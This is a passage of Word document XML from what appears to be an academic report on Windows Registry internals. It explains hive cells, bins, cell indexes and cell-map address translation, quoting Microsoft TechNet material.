          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>A cell that contains information about a key's value. This cell includes a signature (kv), the value's type (e.g., REG_DWORD, REG_BINARY), and the value's name (e.g., Boot-Execute). A value cell also contains the cell index of the cell that contains the value's data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00325366" w:rsidTr="00325366">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>Subkey-list cell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>A cell composed of a list of cell indexes for key cells that are all subkeys of a common parent key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00325366" w:rsidTr="00325366">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>Value-list cell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>A cell composed of a list of cell indexes for value cells that are all values of a common parent key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00325366" w:rsidTr="00325366">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00325366">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>Security-descriptor cell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00325EC6">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>A cell that contains a security descriptor. Security-descriptor cells include a signature (ks) at the head of the cell and a reference count that records the number of key nodes that share the security descriptor. Multiple key cells can share security-descriptor cells.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00325EC6" w:rsidRPr="00325EC6" w:rsidRDefault="00325EC6" w:rsidP="00325EC6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc485303799"/>
      <w:r w:rsidRPr="00325EC6">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3</w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00325EC6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Registry hive cells and their data types.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w:rsidR="00325EC6" w:rsidRPr="00325EC6" w:rsidRDefault="00325EC6" w:rsidP="00325EC6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325EC6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00325EC6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/cc750583.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007634B2" w:rsidRDefault="007634B2">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007634B2" w:rsidRDefault="007634B2" w:rsidP="00325EC6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 2.</w:t>
      </w:r>
      <w:r w:rsidR="002A12C8">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shows cell data types segments that are contained in the hive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007634B2" w:rsidRDefault="007634B2" w:rsidP="007634B2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4916805" cy="2622550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="6" name="Picture 6" descr="https://technet.microsoft.com/en-us/library/cc750583.inreg01_big(l=e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chnet.microsoft.com/en-us/library/cc750583.inreg01_big(l=en-us).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6805" cy="2622550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007634B2" w:rsidRDefault="007634B2" w:rsidP="007634B2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc483834778"/>
      <w:bookmarkStart w:id="38" w:name="_Toc485303761"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cell data type segments in Registry hive.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidR="007634B2" w:rsidRDefault="007634B2" w:rsidP="007634B2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00D02CF9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/cc750583.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00325EC6" w:rsidRPr="00325EC6" w:rsidRDefault="007634B2" w:rsidP="00325EC6">
      <w:r>
        <w:t xml:space="preserve">A cell’s header is a cell field that specifies the cell’s size. When a cell joins a hive, in case a hive needs more space to store that cell, the system will create an allocation unit call “bin”. </w:t>
      </w:r>
      <w:r w:rsidRPr="007634B2">
        <w:t>A bin is the size of the new cell rounded up to the next block boundary. The system considers any space between the end of the cell and the end of the bin free space that it can allocate to other cells. Bins also have headers that contain</w:t>
      </w:r>
      <w:r w:rsidR="00A432FD">
        <w:t xml:space="preserve"> a signature called</w:t>
      </w:r>
      <w:r w:rsidRPr="007634B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A432FD">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="007634B2">
        <w:t>hbin</w:t>
      </w:r>
      <w:r w:rsidR="00A432FD">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="007634B2">
        <w:t xml:space="preserve"> and a field that records the offset into the hive file of the bin and the bin's size.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430F22" w:rsidRDefault="00F41346" w:rsidP="00FA40B2">
      <w:r>
        <w:t xml:space="preserve">Using bin instead of cells to track active parts of the Registry, system can reduce the management overheads. The question is why using bins makes system run smoother than cells? For answering that question, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> identify that cell is a build in unit in Registry hive, but bin is an addon unit in case the hive wants to expand</w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t xml:space="preserve"> its size then</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t>cells are contained</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the hive, but bins are not. When Configuration Manager allocates or deallocates bins, nothing changes in the hive. However, </w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t>when Configuration Manager empties</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a cell in registry hive, it creates an empty bin in the hive, the hive is now fragmented </w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t xml:space="preserve">and leads to the fragmentation of the </w:t>
      </w:r>
      <w:r>
        <w:t>registry. Fragmentation can slow down read and write processes</w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> makes the system run slower. </w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t>When a bin becomes empty, the Configuration Manager adjacent that bin and other empty bins to a large empty bin, and make it as contiguous as possible.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA40B2">
        <w:t>Configuration Manager also joins empty cells to become larger empty cells.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA40B2" w:rsidRDefault="002C43F1" w:rsidP="00FA40B2">
      <w:r w:rsidRPr="002C43F1">
        <w:t xml:space="preserve">The links that create the structure of a hive are cell indexes. A cell index is the offset into the hive file of a cell. Thus, a cell index is like a pointer from one cell to another cell that the Configuration Manager interprets relative to the start of a hive. For example, a cell that describes a key contains a field specifying the cell index of its </w:t>
      </w:r>
      <w:r w:rsidRPr="002C43F1">
        <w:lastRenderedPageBreak/>
        <w:t>parent key; a cell index for a subkey specifies the cell that describes the subkeys that are subordinate to the specified subkey. A subkey-list cell contains a list of cell indexes that refer to the subkey's key cells.</w:t>
      </w:r>
      <w:r w:rsidR="00BB3774">
        <w:t xml:space="preserve"> When we want to locate a key that is a subkey belongs to a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BB3774">
        <w:t>particular key</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BB3774">
        <w:t>, we have to locate the cell containing that key’s subkey lists using the subkey-list cell. For each subkey cell, we check the subkey’s name to fine the one we want to locate.</w:t>
      </w:r>
      <w:r w:rsidR="00E05464">
        <w:t xml:space="preserve"> Let’s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E05464">
        <w:t>take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E05464">
        <w:t xml:space="preserve"> at figure 2.3 default for an example.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E05464" w:rsidRDefault="00E05464" w:rsidP="00E05464">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71881184" wp14:editId="2DC28570">
            <wp:extent cx="5581650" cy="4785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4785360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E05464" w:rsidRPr="00AB2F74" w:rsidRDefault="00E05464" w:rsidP="00AB2F74">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc483834779"/>
      <w:bookmarkStart w:id="40" w:name="_Toc485303762"/>
      <w:r w:rsidRPr="00AB2F74">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2</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3</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AB2F74">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example of cell indexes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidR="00E05464" w:rsidRPr="00E05464" w:rsidRDefault="00E05464" w:rsidP="00E05464">
      <w:r>
        <w:t xml:space="preserve">Consider that we have a parent key and we want to allocate its subkey. First, we find the parent key’s subkey-list cell which is a cell contained in the hive of the parent key. The subkey-list cell could contain many cell-indexes those point to other </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>key-cell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cell of other keys, those are subkey of the current parent key. Suppose that we would like to find subkey A, we locate the cell-index that point to the key-cell cell of a subkey, then check the cell-index that point to a cell containing its name. If the name is A, we have located our subkey correctly, if it is not, we do these steps</w:t>
      </w:r>
      <w:r w:rsidR="00592005">
        <w:t xml:space="preserve"> repeatedly for other cell indexes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> again we find our subkey.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E73C40" w:rsidRDefault="00BC587C" w:rsidP="00FA40B2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The concept of hive, block, cell and bin might be comp</w:t>
      </w:r>
      <w:r w:rsidR="005C63B5">
        <w:t xml:space="preserve">licated and undistinguishable. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007235C2">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>ake a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at figure 2.2 above, we see an </w:t>
      </w:r>
      <w:r w:rsidR="00DA04E1">
        <w:t>entire long square that contains main smaller square. This long square is a registry hive. A hive contains some blocks inside it. A square that is defined by two</w:t>
      </w:r>
      <w:r w:rsidR="00AB2F74">
        <w:t xml:space="preserve"> contiguous</w:t>
      </w:r>
      <w:r w:rsidR="00DA04E1">
        <w:t xml:space="preserve"> dash lines is a block</w:t>
      </w:r>
      <w:r w:rsidR="00AB2F74">
        <w:t xml:space="preserve"> with a fix length of 4096 bytes. The first block of a hive is call a base block, which stores global information for that hive. The free space which is</w:t>
      </w:r>
      <w:r w:rsidR="00E73C40">
        <w:t xml:space="preserve"> the block next to the base block is an empty bin. The next second blocks compose a bin, that bin consists of many cells. A free space within that bin is an empty cell (or a smaller empty bin). Bin is just a concept, a bin in general is not an object with a specific location and fix length.</w:t>
      </w:r>
      <w:r w:rsidR="00AB2F74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E73C40">
        <w:t>From a hive perspective, a bin is an allocation unit that stores cells, and those cells can be allocated or free (which can also be called an empty bin).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E05464" w:rsidRPr="00E73C40" w:rsidRDefault="00E73C40" w:rsidP="00FA40B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E73C40">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cell Maps</w:t>
      </w:r>
      <w:r w:rsidR="00DA04E1" w:rsidRPr="00E73C40">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00577F94" w:rsidRDefault="000C11BF" w:rsidP="000C11BF">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F11BB5">
        <w:t>Since when the system accesses the disk, the overhead for that process is much expensive compare to the outcome speed of these tasks. Configuration Manager decides not to access a hive’s image on disk every time it want to access the Registry. To finish this object, system stores a version of every hive in the kernel’</w:t>
      </w:r>
      <w:r w:rsidR="00577F94">
        <w:t>s address space</w:t>
      </w:r>
      <w:r w:rsidR="00F11BB5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00577F94">
        <w:t xml:space="preserve"> When initializing a hive, Configuration Manager calculates the size of the hive and allocates enough memory from the kernel’s paged pool to store the hive file, and reads the hive file into memory. “</w:t>
      </w:r>
      <w:r w:rsidR="00577F94" w:rsidRPr="00577F94">
        <w:t>The paged pool is a portion of the kernel's address map that NT reserves for device drivers and the kernel to use. NT can move any memory the system allocates from the paged pool to a paging file when the memory isn't in use. If hives never grew, the Configuration Manager could perform all its Registry management on the in-memory version of a hive as if the hive were a file.</w:t>
      </w:r>
      <w:r w:rsidR="00577F94">
        <w:t>”</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1017196930"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00577F94">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00577F94">
            <w:instrText xml:space="preserve"> CITATION Mic97 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00577F94">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00577F94">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> (6)</w:t>
          </w:r>
          <w:r w:rsidR="00577F94">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00C500CD" w:rsidRDefault="00577F94" w:rsidP="000C11BF">
      <w:r>
        <w:t xml:space="preserve">With a cell index, Configuration Manager can calculate the location of a cell by adding the cell index to the base of the in-memory hive image. This is the task of “Ntldr” (Abbreviation for “NT Loader”) does with the SYSTEM hive when the system boots. When the system boots, Ntldr reads entire SYSTEM hive and load it </w:t>
      </w:r>
      <w:r w:rsidR="00C500CD">
        <w:t xml:space="preserve">into memory as a read-only hive, then adds the cell index to the base of the in-memory hive image to locate the cells. However, hives growth by size when they have more subkeys and values added to them, that leads to the system </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C500CD">
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C500CD">
        <w:t xml:space="preserve"> allocate paged pool memory to store the new bins. Therefore, the paged pool that keeps the Registry data is not necessary to be contiguous.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D370AF" w:rsidRDefault="00D370AF" w:rsidP="000C11BF">
      <w:r>
        <w:t xml:space="preserve">For handling the problem of noncontiguous memory buffers those store the hive data, Configuration Manager applies the strategies that Memory Manager does for mapping virtual address space to physical memory addresses </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1456295992"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">CITATION Mic14 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(8)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00577F94">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>The Configuration Mana</w:t>
      </w:r>
      <w:r w:rsidR="00ED091A">
        <w:t xml:space="preserve">ger employs a two-level scheme </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that takes as input a cell index and returns both the address in memory of the block the cell index resides in and the address in memory of the bin the cell resides in. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD10D8" w:rsidRDefault="00D370AF" w:rsidP="000C11BF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 2.</w:t>
      </w:r>
      <w:r w:rsidR="00ED1330">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> describes the process that Configuration Manager handling the </w:t>
      </w:r>
      <w:r w:rsidR="00AD10D8">
        <w:t>noncontiguous memory buffer problems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD10D8" w:rsidRDefault="00AD10D8" w:rsidP="00AD10D8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4783240" cy="2377440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="10" name="Picture 10" descr="cc750583.inreg02_big(l=en-us).gif (46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750583.inreg02_big(l=en-us).gif (461×2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2491" cy="2416831"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD10D8" w:rsidRPr="00AD10D8" w:rsidRDefault="00AD10D8" w:rsidP="00AD10D8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc483834780"/>
      <w:bookmarkStart w:id="42" w:name="_Toc485303763"/>
      <w:r w:rsidRPr="00AD10D8">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2</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4</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AD10D8">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configuration Manager implements a strategy for handling noncontiguous memory buffer problems.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w:rsidR="00AD10D8" w:rsidRPr="00AD10D8" w:rsidRDefault="00AD10D8" w:rsidP="00AD10D8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD10D8">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00AD10D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/cc750583.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AD10D8" w:rsidRDefault="00AD10D8" w:rsidP="00AD10D8">
      <w:r w:rsidRPr="00AD10D8">
        <w:t>To implement the mapping, the Configuration Manager divides a cell index logically into fields, in the same way that the Memory Manager divides a virtual address into fields. NT interprets a cell index's first field as an index into a hive's cell map directory. The cell map directory contains 1024 entries, each of which refers to a cell map table that contains 512 map entries. The second field in the cell index specifies the entry in the cell map table that the first index field identified. That entry locates the bin and block memory addresses of the cell. In the final step of the translation process, the Configuration Manager interprets the last field of the cell as an offset into the identified block to precisely locate a cell in memory. When a hive initializes, the Configuration Manager dynamically creates the mapping tables, designating a map entry for each block in the hive, and adds and deletes tables from the cell directory as the changing size of the hive requires.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00525B3D" w:rsidRPr="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="00AD10D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00525B3D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Registry Namespace and Operation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00680540" w:rsidRPr="00525B3D" w:rsidRDefault="008E4183" w:rsidP="00AD10D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Registry Root K</w:t>
      </w:r>
      <w:r w:rsidR="00525B3D" w:rsidRPr="00525B3D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>eys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
      <w:r>
        <w:t xml:space="preserve">A registry key that lying at the top level of a hive is called a root key, all root keys have a prefix of “HKEY” </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-590079721"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Mic3 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(9)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>. Each root key points to a specific hive that have an essential job to the system operation. Root keys and their descriptions are shown in the table below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
